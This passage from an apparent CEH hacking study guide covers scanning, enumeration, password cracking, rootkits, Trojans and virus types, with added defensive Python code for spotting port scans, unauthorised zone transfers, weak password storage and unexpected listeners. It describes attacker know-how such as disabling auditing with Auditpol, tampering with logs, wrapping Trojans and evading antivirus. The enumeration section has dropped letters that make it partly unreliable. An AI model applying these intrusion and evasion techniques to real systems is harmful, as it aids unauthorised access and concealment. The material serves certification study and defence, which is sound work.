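            alerted.add(ev["src"])
            alerts.append((ev["src"], ev["ts"], sorted(ports)))
    return alerts


# Constructed log: a fast scanner, a slow scanner spacing probes 5 minutes apart,
# one normal client hitting only port 443, and an unrelated kernel line.
SAMPLE_LOG = [
    "2024-05-01T10:00:00 DROP SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP DPT=21 SYN",
    "2024-05-01T10:00:01 DROP SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP DPT=22 SYN",
    "2024-05-01T10:00:02 DROP SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP DPT=23 SYN",
    "2024-05-01T10:00:02 ACCEPT SRC=192.0.2.55 DST=192.0.2.10 PROTO=TCP DPT=443 SYN",
    "2024-05-01T10:00:03 DROP SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP DPT=25 SYN",
    "2024-05-01T10:00:04 ACCEPT SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP DPT=80 SYN",
    "2024-05-01T10:00:05 ACCEPT SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP DPT=443 SYN",
    "2024-05-01T10:00:09 ACCEPT SRC=192.0.2.55 DST=192.0.2.10 PROTO=TCP DPT=443 SYN",
    "2024-05-01T10:00:30 DROP SRC=198.51.100.4 DST=192.0.2.10 PROTO=TCP DPT=22 SYN",
    "kernel: link is up",
    "2024-05-01T10:05:30 ACCEPT SRC=198.51.100.4 DST=192.0.2.10 PROTO=TCP DPT=80 SYN",
    "2024-05-01T10:10:30 ACCEPT SRC=198.51.100.4 DST=192.0.2.10 PROTO=TCP DPT=443 SYN",
]

if __name__ == "__main__":
    for src, when, ports in detect_port_scans(SAMPLE_LOG):
        print(f"{when.isoformat()} possible port scan from {src}: {ports}")
    # a wider window with a lower threshold also catches the slow scanner
    print(detect_port_scans(SAMPLE_LOG, window_s=3600, threshold=3))
```

With the defaults (60 s window, 5 ports) only 203.0.113.7 is reported, on its fifth distinct port; 198.51.100.4 never has more than one port inside any 60 s window, which is exactly why slow scans need a longer window or a per-day tally to surface. Widening the window to an hour and lowering the threshold to 3 reports both scanners and still leaves the client on port 443 alone.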


War Dialing Countermeasure
War Dialing is the technique of using a special program with a modem to automatically scan a list of telephone numbers, usually dialing every number in a local area code to search for computers. When hackers target companies, one of the first things they do is war dial the central office near the company. Companies rarely control the dial-in ports as strictly as the firewall; machines with attached modems are sprinkled throughout the company on people's desktop computers and special-purpose computers that communicate with partners.
War Dialing Tools: WarVOX, PhoneSweep, and ToneLoc
Tool to detect War Dialing: Sandtrap


Scanning Pen Testing 1. Perform Host discovery (Nmap, Angry IP Scanner, etc.) 2. Perform Port scanning (Nmap,Netscan, UDP Scanner,etc.) 3. Perform Banner Grabbing/OS Fingerprinting (Telnet, Netcraft, Error Pages, etc .) 4. Scan for vulnerabilities (SAINT, Core Impact,Nessus) 5. Draw Networ Diagrams (LAN Surveyor, Ipsonar) 6. Prepare Proxies (Proxifier, Soc sChain, SSL Proxy) 7. Document all findings Module 4 Enumeration Study Guide Objectives: . Enumeration Defined . Techniques for Enumeration . NetBIOS Enumeration . User Account Enumeration . SNMP Enumeration . Unix/Linux Enumeration . LDAP / Active Directory . NTP Enumeration . SMTP and DNS Enumeration . Enumeration Countermeasures Enumeration Defined Enumeration is the process of extracting user names, machine names, networ reso urces, and lists of services from a target environment. This step in the methodology is often carrie d out along with scanning. As your information comes in from your various tests and sources it is imperative to Document Everything. Enumeration often comes into play when a hac er has wor ed themselves into a place on the networ , such as on an intranet Techniques for Enumeration The techniques listed below are used to gather Username information or networ d evice information. In order to create a clearer picture of a target, multiple methods are commonly together. NetBIOS Enumeration NetBIOS refers to an older method of communication over a networ to control ses sions. This is still commonly used over TCP/IP. The name service eeps a list of computers that belon g to a domain. If services that are used contain NetBIOS names, this may allow a hac er to create a list of computers in the networ . For example running the psexec tool can be used to list an ipconfig output from all the computers on the domain. User Account Enumeration Creating a list of user accounts is often necessary for a hac er. User accounts be found on a local machine or in a domain structure. can

used SNMP Enumeration The Simple Networ Management Protocol is intended to be used to remotely monito r devices on a networ using TCP/IP. Using this protocol an attac er can extract information, e specially if the default public and private names are still in use. Most networ monitoring software can be u sed in this manner. Unix/Linux Enumeration These systems have some standard commands for finding information on the networ showmount command finds shared directories. The finger command can be used to list user, h ost, and other information on a system. Rpcclient and rpcinfo can be used to determine username s and applications communicating over the networ LDAP Enumeration Lightweight Directory Access Protocol is a method used to access listing in an A ctive Directory type environment. Using a tool such as JXplorer a hac er can attach to a directory an d read the contents in a very manageable form. NTP Enumeration Using the Networ Time Protocol on UDP 123, computers on a networ can be ept i sync with the NTP server. This also allow for tools to scan and determ s ine if this port is open on target systems. n . The

SMTP Enumeration The Simple Mail Transfer Protocol was not built with security in mind. Accessing server with SMTP port 25 open can be a very simple process. The SMTP server provides feedbac abo ut email addresses as they are given to the service, this can be used to verify newly found em a ail ddresses DNS Enumeration The Domain Name service provides a translation for IP addresses that devices use on a networ into words that are better understood and remembered by humans. If configured incorre ctly it is possible for an attac er to use this service to enum erate all the system on a networ . F s the command line the syntax is: host -l domain name ip address or dns name of DNS server. The nsl command can also be used to enumerate hosts. Enumeration Countermeasures As always, only use services that are necessary for a system. If you do not need SNMP, NTP, SMTP, or LDAP, eep them disabled. You should always change default passwords to accounts , even on networ devices such as routers, switches, and gateways. Restrict information from being accessed by Anonymous connections. Test configurations of DNS and SMTP servers to ensure the y are configured properly and are only accessed by systems and users who have been authenticated. a
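The DNS countermeasure above (only authenticated systems may pull the zone) can be checked from the server's own logs. The following is an added example for this study guide, not CEH courseware: it reads log lines constructed in the style of BIND's xfer-out messages, flags every AXFR served to a client outside an assumed allow-list of secondary servers, and renders that allow-list as the BIND allow-transfer option that enforces it. The addresses come from the RFC 5737 documentation ranges.

```python
"""Flag DNS zone transfers (AXFR) served to hosts that are not authorised
secondaries.  Added example for this study guide, not part of the CEH
courseware.  The log lines are constructed in the style of BIND's xfer-out
log messages; the allow-list of secondary servers is an assumption."""
import ipaddress
import re

# Assumption: only these two secondary name servers may pull the zone.
ALLOWED_SECONDARIES = [
    ipaddress.ip_network("192.0.2.10/32"),
    ipaddress.ip_network("192.0.2.11/32"),
]

# Constructed sample log (documentation addresses from RFC 5737).
SAMPLE_LOG = """\
10-Mar-2024 09:14:02.113 xfer-out: info: client 192.0.2.10#40123 (example.com): transfer of 'example.com/IN': AXFR started
10-Mar-2024 09:14:02.301 xfer-out: info: client 192.0.2.10#40123 (example.com): transfer of 'example.com/IN': AXFR ended
10-Mar-2024 11:52:47.009 xfer-out: info: client 198.51.100.77#51987 (example.com): transfer of 'example.com/IN': AXFR started
10-Mar-2024 11:52:47.042 xfer-out: info: client 198.51.100.77#51987 (example.com): transfer of 'example.com/IN': AXFR ended
10-Mar-2024 12:03:11.500 queries: info: client 203.0.113.5#53422 (www.example.com): query: www.example.com IN A + (192.0.2.1)
"""

AXFR_STARTED = re.compile(
    r"client (?P<ip>[0-9A-Fa-f.:]+)#\d+ \([^)]*\): "
    r"transfer of '(?P<zone>[^']+)': AXFR started"
)


def parse_transfers(log_text):
    """Return (client_ip, zone) for every zone transfer that was started."""
    transfers = []
    for line in log_text.splitlines():
        match = AXFR_STARTED.search(line)
        if match:
            transfers.append((match.group("ip"), match.group("zone")))
    return transfers


def is_allowed(ip_text, allowed):
    """True when the client address falls inside one of the allowed networks."""
    ip = ipaddress.ip_address(ip_text)
    return any(ip in net for net in allowed)


def unauthorised_transfers(log_text, allowed=ALLOWED_SECONDARIES):
    """Transfers served to clients outside the allow-list: each one means the
    full zone (every host name in it) was handed to an unknown party."""
    return [(ip, zone) for ip, zone in parse_transfers(log_text)
            if not is_allowed(ip, allowed)]


def allow_transfer_clause(allowed):
    """Render the allow-list as a BIND 'allow-transfer' option so the
    countermeasure (restrict AXFR to known secondaries) can be applied in
    named.conf; single hosts are written without a prefix length."""
    parts = []
    for net in allowed:
        if net.prefixlen == net.max_prefixlen:
            parts.append(f"{net.network_address};")
        else:
            parts.append(f"{net};")
    return "allow-transfer { " + " ".join(parts) + " };"


if __name__ == "__main__":
    for ip, zone in unauthorised_transfers(SAMPLE_LOG):
        print(f"ALERT: zone {zone} transferred to unauthorised client {ip}")
    print("Suggested named.conf option:", allow_transfer_clause(ALLOWED_SECONDARIES))
```

The check is deliberately based on the transfer log rather than on probing the server: a successful AXFR from an unlisted client is exactly the event the enumeration section warns about, and the allow-transfer clause is the configuration change that stops the next one. On a real server the log category and message layout should be confirmed against the named configuration before relying on the pattern.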

Module 5 System Hacking Study Guide
Objectives:
. Introduction to System Hacking
. Password Cracking
. Password Cracking Techniques
. Types of Password Attacks
. Automatic Password Cracking Algorithm
. Privilege Escalation
. Executing Applications
. Keylogger
. Spyware
. Rootkits
. Detecting Rootkits
. NTFS Data Stream
. What is Steganography
. Steganalysis
. Covering Tracks

Introduction to System Hacking
Stages of hacking and where System Hacking comes in:
1. Footprinting - IP ranges, namespace, employee web usage
2. Scanning - Target assessment, identification of services, identification of systems
3. Enumeration - Intrusive probing, user lists, security flaws
4. System Hacking -
a) Gaining access (cracking passwords, escalating privileges)
b) Maintaining access (executing applications, hiding files)
c) Clearing logs (covering tracks)

Password Cracking
Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. Password complexity is crucial in the defense against password cracking.

Password Cracking Techniques
Dictionary Attacks - A dictionary attack uses a targeted technique of successively trying all the words in an exhaustive list called a dictionary (a pre-arranged list of values). A dictionary attack tries only those possibilities which are most likely to succeed, typically derived from a list of words, for example a dictionary (hence the phrase "dictionary attack") or a bible. Generally, dictionary attacks succeed because many people have a tendency to choose passwords which are short (7 characters or fewer).
Brute Forcing Attacks - Brute force, or exhaustive key search, is a strategy that can in theory be used against any encrypted data by an attacker who is unable to take advantage of any weakness in an encryption system that would otherwise make the task easier. It involves systematically checking all possible keys until the correct key is found.
Hybrid Attack - A hybrid attack builds on the dictionary attack method by adding numerals and symbols to dictionary words.
Syllable Attack - A combination of brute force and dictionary attacks. This can be effective for non-existent words.
Rule-based Attack - Used when an attacker gains some information, usually following some form of enumeration that has identified the password policy in place. This allows the attacker to customize the cracking tools to be used.

Types of Password Attacks
Passive Online Attacks
Wire Sniffing - Packet sniffing tools can be run on a LAN to access and record raw network traffic.
Active Online Attacks
Man-in-the-Middle (MITM) Attack - A form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.
Replay Attack - An attack where an authentication session is captured by a sniffer, then replayed by an attacker to fool a computer into granting access.
Trojans/Spyware/Keyloggers -
a) Trojans can be used to gain access to computers and phone home to an attacker, giving them remote control of the system.
b) Spyware is a type of malware that can be installed on computers to collect pieces of information about users without their knowledge.
c) Keyloggers are a type of spyware that runs in the background and allows recording of keystrokes.
Hash Injection Attack - An attacker injects a compromised hash into a local session and uses the hash to validate and gain access to network resources.
Rainbow Attacks: Pre-Computed Hash
1. Rainbow table - A rainbow table is a precomputed table for reversing cryptographic hash functions, usually for cracking password hashes.
2. Computed hashes - Compute the hash for a list of possible passwords and then compare it with the precomputed hash table. If a match is found then the password is cracked.
3. Compare the hashes - It is easy to recover passwords by comparing the captured password hashes to the precomputed tables.
Distributed Network Attack (DNA) - A technique used to recover password-protected files. In the past, recoveries have been limited to the processing power of one machine. DNA uses the power of machines across the network or across the world to decrypt passwords.
Non-Electronic Attacks
Social Engineering - The art of manipulating people into performing actions or divulging confidential information, in contrast to breaking in or using technical cracking techniques.
Shoulder Surfing - Unauthorized viewing of either the user's keyboard or screen while he/she is logging in.
Dumpster Diving - Searching for sensitive information in residential or commercial trash bins, printer trash bins, or at a user's desk.

Automatic Password Cracking Algorithm
1. Find a valid user
2. Find the encryption algorithm used
3. Obtain the encrypted passwords
4. Create a list of possible passwords
5. Encrypt each word
6. See if there is a match for each user ID
7. Repeat steps 1 through 6

The vulnerability does not arise from the hashing process but from the storage. Systems do not "decrypt" the stored password during authentication, but store the one-way hash. During the login process, the password entered is run through the algorithm, generating a one-way hash that is compared to the hash stored on the system. If they are the same, it is assumed the proper password was supplied. Therefore all that an attacker has to do in order to crack a password is to get a copy of the one-way hash stored on the server, and then use the algorithm to generate his/her own hashes until they get a match.

Privilege Escalation
Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions.
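The passage above places the weakness in how the hash is stored, not in the hash function, and the rainbow-table section explains why: a bare hash of a common password is the same on every system, so it can be looked up in a table computed in advance. The following is an added example for this study guide, not CEH courseware, contrasting that weak storage with a per-user salt and an iterated hash (PBKDF2 from Python's standard library). The six-word dictionary, the record layout "salt$digest", and the iteration count are constructed for the demonstration.

```python
"""Why stored hashes, not the hash function, are the weak point: an unsalted
hash can be reversed by a lookup in a precomputed table, while a salted,
iterated hash forces the attacker to recompute per record.  Added example
for this study guide, not CEH courseware; the word list is constructed."""
import hashlib
import hmac
import os

# Constructed stand-in for a cracking dictionary.
DICTIONARY = ["password", "letmein", "welcome", "qwerty", "monkey", "dragon"]

# Work factor for PBKDF2; real deployments tune this to their hardware.
ITERATIONS = 100_000


def precompute_table(words):
    """The attacker's precomputed table: unsalted SHA-1 digest -> word.
    A rainbow table is a space-saving form of the same idea."""
    return {hashlib.sha1(w.encode()).hexdigest(): w for w in words}


def store_unsalted(password):
    """Weak storage: a bare one-way hash, identical for every user who
    picks the same password, and identical across systems."""
    return hashlib.sha1(password.encode()).hexdigest()


def lookup_unsalted(stored_hash, table):
    """Reversing a weak hash is a dictionary lookup; no hashing is needed."""
    return table.get(stored_hash)


def store_salted(password, salt=None):
    """Hardened storage: per-user random salt plus an iterated hash.
    Record format 'salt_hex$digest_hex' is an assumed layout, not a standard."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt.hex() + "$" + digest.hex()


def verify_salted(password, stored):
    """Recompute with the stored salt; constant-time compare of the digests."""
    salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), ITERATIONS)
    return hmac.compare_digest(digest.hex(), digest_hex)


def guesses_needed(stored, words):
    """Count the full PBKDF2 computations a dictionary run costs against ONE
    salted record before it hits (None if the word is not in the list).
    The precomputed table is useless here because the salt changes the
    hash input, and the cost is paid again for every record."""
    for count, word in enumerate(words, start=1):
        if verify_salted(word, stored):
            return count
    return None
```

Salting alone does not stop a dictionary attack against a single record (a weak password in the list is still found), which is why password complexity remains crucial; what the salt and the iteration count change is that the attacker can no longer reuse work across users or across systems, and each guess costs a full slow hash.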



Executing Applications
Attackers execute malicious applications in this stage. This is called "owning" the system.

Keylogger
Keystroke logging is the action of tracking (or logging) the keys struck on a keyboard, typically in a covert manner so that the person using the keyboard is unaware that their actions are being monitored. There are numerous keylogging methods, ranging from hardware- and software-based approaches to electromagnetic and acoustic analysis.

Spyware
Spyware is a type of malware that can be installed on computers, and which collects small pieces of information about users without their knowledge. The presence of spyware is typically hidden from the user, and can be difficult to detect. Typically, spyware is secretly installed on the user's personal computer. Sometimes, however, spyware such as keyloggers is installed by the owner of a shared, corporate, or public computer on purpose in order to secretly monitor other users.
Spyware programs can collect various types of personal information, such as Internet surfing habits and sites that have been visited, but can also interfere with user control of the computer in other ways, such as installing additional software and redirecting web browser activity. Spyware is known to change computer settings, resulting in slow connection speeds, different home pages, and/or loss of Internet connection or functionality of other programs.

Rootkits
Rootkits are kernel programs that have the ability to hide themselves and cover up traces of their activities. They replace certain operating system calls and utilities with their own modified versions of those routines.
Kernel rootkits can be especially difficult to detect and remove because they operate at the same security level as the operating system itself, and are thus able to intercept or subvert the most trusted operating system operations. Any software, such as antivirus software, running on the compromised system is equally vulnerable. In this situation, no part of the system can be trusted.
The attacker acquires root access to the system by installing a virus, Trojan, or spyware in order to exploit it. Rootkits allow the attacker to maintain hidden access to the system.

Detecting Rootkits
Integrity-Based Detection - Compares a snapshot of file systems, boot records, or memory with a known trusted baseline.
Signature-Based Detection - Compares characteristics of all system processes and executable files with a database of known rootkit fingerprints.
Heuristic Detection - Looks for deviations from normal system patterns and behavior to find unidentified rootkits based on their execution path.
Cross-View-Based Detection - Compares "trusted" raw data with "tainted" content returned by an API (Application Programming Interface).

NTFS Data Stream
An NTFS Alternate Data Stream (ADS) is a Windows hidden stream that contains metadata for the file such as attributes, word count, author name, and access and modification times of the files. ADS has the ability to fork data into existing files without changing or altering their functionality, size, or display to file browsing utilities. ADS allows an attacker to inject malicious code on a breached system and execute it without being detected by the user.

What is Steganography?
Steganography is the art and science of writing hidden messages in such a way that no one, apart from the sender and intended recipient, suspects the existence of the message; a form of security through obscurity. In digital steganography, electronic communications may include steganographic coding inside of a transport layer, such as a document file, image file, program or protocol. Media files are ideal for steganography because of their large size. Subtle changes in a large file can easily go unnoticed.

Steganalysis
The goal of steganalysis is to identify suspected packages, determine whether or not they have a payload encoded into them, and, if possible, recover that payload.

Covering Tracks
. Remove activity tracks
. Remove web activity tracks such as MRU (Most Recently Used) lists, cookies, cache, temporary files, and history
. Disable auditing: use Auditpol
. Tamper with log files: modify event log files, server log files, and proxy log files by log poisoning or flooding
. Close all remote connections to the victim machine
. Close any opened port

Module 6 Trojans and Backdoors Study Guide
Objectives:
. What is a Trojan?
. Overt and Covert Channels
. Purpose of Trojans
. Indications of a Trojan Attack
. Common Ports Used By Trojans
. How to Infect Systems Using Trojans
. Types of Trojans
. How to Detect Trojans
. Evading Anti-Virus Techniques
. Trojan and Backdoor Countermeasures

What is a Trojan?
A Trojan is a remote access tool disguised as a different piece of software. Trojans are set apart from other types of malware by the ability to phone home and allow a hacker to access a system in real time.

Overt and Covert Channels
Overt channels are those used in legitimate data traffic, such as HTTP traffic over port 80. Covert channel communication takes place over channels that are not intended for data traffic, or by hiding information that violates security policy in an overt channel.

Purpose of Trojans
Trojans allow a hacker to control a compromised computer just as if they had physical access. They can be used to obtain sensitive information such as passwords or to further open the computer for other attacks. Trojans are a multi-purpose tool of hackers, used for many different types of attacks. An attacker may use a Trojan for a specific purpose or for going after specific information. It is also possible to use a Trojan for information gathering at first and then make the compromised system available to other hackers for use as a zombie or proxy.

Indications of a Trojan Attack
Almost any odd or unexpected behavior of a system could be linked to an infiltration by a Trojan. Many also have the ability to kill the Task Manager and msconfig processes in order to keep their own processes from being disabled. The only guaranteed method of removing a Trojan is to reinstall the OS from known good media.

Common Ports Used By Trojans
In the past Trojans used specific ports such as 31337 for Back Orifice and 12345 for NetBus. These ports can be found with a Google search. However, it is common to use common ports in a covert manner as well.

How to Infect Systems Using Trojans
When a Trojan is written, the malicious code is inserted into some sort of wrapper that disguises the code as something benign like a harmless jpg file or a simple game. Once the Trojan is wrapped it can be placed on a website to be downloaded, emailed as an attachment, or placed on a USB stick or CD. A CD/USB stick can be configured to autorun so that when an attacker intentionally leaves media for others to find, the person who finds the attacker's media will try to see what is on that mysterious CD or USB stick and unknowingly install the attacker's Trojan. The possibilities are endless.

Types of Trojans
Trojans can be used over many different protocols, are delivered in numerous ways, and can be written with pinpoint target accuracy. These many faces of Trojans represent the different types listed in the CEH courseware.
By method - Trojans that use a specific method of communication or deployment: VNC, HTTP/HTTPS, ICMP, Command Shell, Document, Covert Channel, Email, FTP, SPAM
Trojans that have specific targets: Credit Card Trojans, E-banking Trojans, Mobile Trojans, MAC OS X Trojans
Trojans that have a specific payload or create a payload: Data hiding (encrypts data, sometimes ransoming the ability to decrypt the data back to the victim: ransomware), Destructive, Botnet Trojan, Proxy Server Trojan, Defacement Trojan

How to Detect Trojans
Detecting Trojans relies on having a baseline to compare suspicious behavior against. Trojans can cause suspicious traffic on open ports, create registry entries, files, or folders, or show up as newly installed programs. The CEH expects you to be familiar with these activities.

Evading Anti-Virus Techniques
Anti-malware software attempts to identify Trojans by wrapper signature or by code signature. A Trojan writer can avoid leaving a signature by using a wrapper or Trojan that was self-written. By changing the code itself, it appears different, and still accomplishes the goal of the Trojan. A Trojan can also be broken up into multiple pieces for deployment and then assembled at the victim to evade detection.

Trojan and Backdoor Countermeasures
Trojans are an insidious threat. The most innocent-looking file or program could be hiding a malicious payload. Trojans fit the idea of "They are everyone, and they are no one." The only sure-fire way of avoiding compromise is to not connect to the Internet. Even with this you could be compromised, but the Trojan would be unable to phone home. Common Trojans can be detected by anti-malware software, but a personally written one will not always be caught. Trojans may be detected by looking for suspicious port activity or files, but they may hide in common port traffic or inject into other files. Education about the risk Trojans pose increases awareness and decreases the likelihood of dangerous behavior like downloading files from the Internet and viewing unknown email attachments. However, Trojans may be hidden in critical components for business or on websites that are commonly used.
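Both the detection section and the countermeasures above come back to the same check: compare current port activity against a baseline. The following is an added example for this study guide, not CEH courseware. It parses a socket listing constructed in the layout of Windows "netstat -ano", reports every listener that is absent from an assumed baseline of expected ports, and annotates the two historical Trojan ports the guide names (31337 for Back Orifice, 12345 for NetBus) as added context only; because modern Trojans sit on ordinary ports, the baseline comparison, not the port number, is the detection.

```python
"""Compare listening sockets against a baseline to spot new listeners, the
port-activity check described above.  Added example for this study guide,
not CEH courseware.  The socket listing is constructed in the layout of
Windows 'netstat -ano'; the baseline of expected ports is an assumption."""
import re

# Ports the study guide names as historically used by specific Trojans.
KNOWN_TROJAN_PORTS = {31337: "Back Orifice", 12345: "NetBus"}

# Assumed baseline for this host: the listeners recorded when it was built.
BASELINE = {("TCP", 135), ("TCP", 445), ("TCP", 3389), ("UDP", 137)}

# Constructed sample in the layout of 'netstat -ano' on Windows.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1180
  TCP    0.0.0.0:31337          0.0.0.0:0              LISTENING       4412
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       5316
  TCP    192.0.2.4:49712        203.0.113.9:443        ESTABLISHED     2100
  TCP    [::]:445               [::]:0                 LISTENING       4
  UDP    0.0.0.0:137            *:*                                    4
  UDP    0.0.0.0:12345          *:*                                    5120
"""

SOCKET_LINE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+(?P<laddr>\S+):(?P<lport>\d+)\s+"
    r"(?P<raddr>\S+)\s+(?P<state>[A-Z_]+)?\s*(?P<pid>\d+)\s*$"
)


def parse_listeners(text):
    """Return (proto, port, pid) for every TCP listener and every bound UDP
    socket (UDP lines have no state column); established TCP connections
    are skipped because they are not listening services."""
    listeners = []
    for line in text.splitlines():
        match = SOCKET_LINE.match(line)
        if not match:
            continue
        proto, state = match.group("proto"), match.group("state")
        if proto == "TCP" and state != "LISTENING":
            continue
        listeners.append((proto, int(match.group("lport")), int(match.group("pid"))))
    return listeners


def find_suspicious(listeners, baseline=BASELINE, known=KNOWN_TROJAN_PORTS):
    """Every listener absent from the baseline is reported once; a match in
    the historical Trojan port list only adds context to the reason."""
    findings = []
    seen = set()
    for proto, port, pid in listeners:
        if (proto, port) in baseline or (proto, port) in seen:
            continue
        seen.add((proto, port))
        reason = "not in baseline"
        if port in known:
            reason += f"; port historically used by {known[port]}"
        findings.append((proto, port, pid, reason))
    return findings


if __name__ == "__main__":
    for proto, port, pid, reason in find_suspicious(parse_listeners(SAMPLE_NETSTAT)):
        print(f"{proto} port {port} (PID {pid}): {reason}")
```

The PID in each finding is the pivot to the next checks the guide lists (the executable behind the process, its registry run keys and files); the port 8080 finding shows why the baseline matters, since nothing about that number is suspicious on its own.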


Module 7 Viruses and Worms Study Guide
Objectives:
. Introduction to Viruses
. Stages of Virus Life
. How a Virus Works
. Virus Analysis
. Types of Viruses
. Writing a Simple Virus Program
. Computer Worms
. Worm Analysis
. What is a Sheep Dip Computer
. Malware Analysis Procedure
. Virus Detection Methods
. Virus and Worm Countermeasures
. Anti-Virus Tools
. Penetration Testing for Viruses

Introduction to Viruses
A virus is a self-replicating program that produces its own code by attaching copies of itself into other executable code. A true virus can spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Some viruses affect computers as soon as their code is executed; other viruses lie dormant until a predetermined logical circumstance is met.

Stages of Virus Life
Design - Developing virus code using programming languages or construction kits
Replication - The virus replicates for a period of time within the target system and then spreads itself
Launch - It gets activated when the user performs certain actions such as running an infected program
Detection - A virus is identified as a threat infecting target systems
Incorporation - Anti-virus software developers assimilate defenses against the virus
Elimination - Users install anti-virus updates and eliminate the virus threats

How a Virus Works
Infection phase - The virus replicates itself and attaches to an .exe file in the system. Some viruses infect each time they are run and executed completely, and others infect only when users trigger them, which can include a day, time, or a particular event.
Attack phase - Some viruses have trigger events to activate and corrupt systems. Some have bugs that replicate and perform activities such as file deletion and decreasing the session's time. Sometimes they corrupt targets only after spreading completely as intended by their developers.

Virus Analysis
Why are viruses created?
. To inflict damage on competitors
. Financial benefits
. Research
. For pranks
. Vandalism
. Cyber terrorism
. Distribution of political messages
Indications of a virus attack:
. Processes take more resources and time
. Computer slows when programs start
. Files and folders are missing
. Hard drive is accessed often
. Unable to load the OS
. Anti-virus alerts
. Browser window freezes
How are computers infected?
. Opening infected email attachments
. Not running the latest anti-virus software
. Not updating and installing new versions of plug-ins
. Installing pirated software
. When a user accepts files and downloads without checking the source properly
Virus Hoaxes - There are a lot of viruses out there. And then there are some viruses that aren't really out there at all. Hoax virus warning messages are more than annoyances. After repeatedly becoming alarmed, only to learn that there was no real virus, computer users may get into the habit of ignoring all virus warning messages, leaving them especially vulnerable to the next real and truly destructive virus.

Types of Viruses
System or Boot Sector Viruses - Moves the MBR to another location on the hard disk and copies itself to the original location of the MBR. When the system boots, the virus code is executed first and then control is passed to the original MBR.
File Viruses - File viruses infect executable files by inserting their code into some part of the original file so that the malicious code can be executed when the file is accessed. An overwriting file virus is one that overwrites the original file entirely, replacing it with the malicious code. File-infecting viruses have targeted a range of operating systems, including Macintosh, UNIX, DOS, and Windows. Overwriting viruses cause irreversible damage to the files.
Example: Loveletter, which operated as an email worm, file virus, and Trojan downloader, is a notorious example of a file-overwriting virus. Loveletter searched for certain file types and overwrote them with its own malicious code, permanently destroying the contents of those files. Files affected by an overwriting virus cannot be disinfected and instead must be deleted and restored from backup.
Multipartite Viruses - Attempt to attack both the boot sector and the executable or program files at the same time.
Example: Ghostball - It infected both executable .COM files and boot sectors.
Macro Viruses - Infect files created by Microsoft Word or Excel. Most are written in Visual Basic for Applications (VBA). Macro viruses infect templates or convert infected documents into template files, while maintaining their appearance of ordinary document files.
Example: The Melissa virus would spread on the word processors Microsoft Word 97 and Word 2000 and also Microsoft Excel 97, 2000 and 2003. It could mass-mail itself from the e-mail client Microsoft Outlook 97 or Outlook 98. If a Word document containing the virus, either LIST.DOC or another infected file, is downloaded and opened, then the macro in the document runs and attempts to mass-mail itself. When the macro mass-mails, it collects the first 50 entries from the alias list or address book and sends itself to the e-mail addresses in those entries.
Cluster Viruses - A type of virus that associates itself with the execution of programs by modifying directory table entries to ensure the virus itself will start when any program on the computer system is started. If infected with a cluster virus it will appear as if every program on the computer system is infected; however, a cluster virus is only in one place on the system.
Stealth / Tunneling Viruses - This virus actively hides itself from anti-virus software by either masking the size of the file that it hides in or temporarily removing itself from the infected file. It places a copy of itself in another location on the drive, replacing the infected file with an uninfected one that it has stored on the hard drive.
Encryption Viruses - This type of virus uses encryption to mask its code. It is encrypted with a different key for each infected file. AV scanners cannot directly detect these types of viruses using signature detection methods.
Polymorphic Code - Uses encryption to transform its code into an alternate, encrypted form. To execute, a polymorphic virus must decrypt itself back to its original form. It will then mutate with new encryption. To enable the polymorphic code, the virus has to have a polymorphic engine (also called a mutating engine or Encrypted Mutation Engine). A well-written polymorphic virus has no parts that stay the same on each infection.
Metamorphic Viruses - This virus actually makes direct changes to its code, permanently altering itself between each iteration. The code changes performed by a metamorphic virus are directed by a metamorphic engine, which may itself be altered between iterations. This is the counterpart to a polymorphic virus's polymorphic engine. The alterations in code carried out by a metamorphic virus make it much harder for traditional signature-based antivirus programs to identify two separate iterations as one and the same virus. Fortunately, the technical challenges involved in creating a functioning metamorphic virus are quite high, making them very rare creations.
File Overwriting or Cavity Viruses - A cavity virus attempts to install itself inside of the file it is infecting. This is difficult to do. Most viruses take the easy way out when infecting files; they simply attach themselves to the end of the file and then change the start of the program so that it first points to the virus and then to the actual program code. Many viruses that do this also implement some stealth techniques so you don't see the increase in file length when the virus is active in memory. A cavity virus, on the other hand, attempts to be clever. Some program files, for a variety of reasons, have empty space inside of them. This empty space can be used to house virus code. A cavity virus attempts to install itself in this empty space while not damaging the actual program itself. An advantage of this is that the virus then does not increase the length of the program and can avoid the need for some stealth techniques.
Example: Lehigh virus
Sparse Infector Viruses - They will infect only occasionally (e.g. every tenth program executed), or only files whose lengths fall within a narrow range.
Companion / Camouflage Viruses - Instead of modifying an existing file, these viruses create a new program which (unknown to the user) is executed instead of the intended program. On exit, the new program executes the original program so that things appear normal. On PCs this has usually been accomplished by creating an infected .COM file with the same name as an existing .EXE file. Integrity-checking antivirus software that only looks for modifications in existing files will fail to detect such viruses.
Shell Viruses - Virus code forms a shell around the target host program's code, making itself the original program and the host code its sub-routine. Almost all boot program viruses are shell viruses.
File Extension Viruses - These viruses change the extensions of files. A countermeasure is to turn off "Hide file extensions" in Windows.
Add-on and Intrusive Viruses - Add-on viruses append their code to the host code. Without making any changes to it, the virus relocates the host code or inserts its own code at the beginning. Intrusive viruses overwrite the host code partly or completely with viral code.
